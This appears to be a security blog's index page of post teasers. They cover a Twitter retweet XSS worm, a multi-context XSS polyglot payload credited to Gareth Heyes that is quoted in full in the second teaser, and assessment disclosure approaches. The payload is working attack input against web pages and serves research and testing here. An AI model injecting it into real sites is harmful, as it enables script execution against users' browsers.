So someone started a re-tweet XSS worm on Twitter. They were able to embed a span class and provide an “Onmouseover” event that causes the post to be re-tweeted when hovered over. Twitter has “patched” but I still see lots of folks trying to prove them wrong. There’s some better analysis about the whole thing...Read More
Gareth Heyes of The Spanner came up with an XSS payload that works in multiple contexts and browsers. As always mileage will vary by vector and browser but I thought it was universal/cool enough to mention. javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”>[img=1]<img -/style=-=expression(/*’/-/*’,/**/eval(name)//);width:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript:eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>”Read More
The majority of our assessment clients choose a full-disclosure approach to security assessments. They realize that this helps us maximize results in terms of vulnerabilities discovered thus providing the most value for a given cost. Other times assessment clients are interested in zero-knowledge assessments that simulate an attack from an outside threat with minimal knowledge...Read More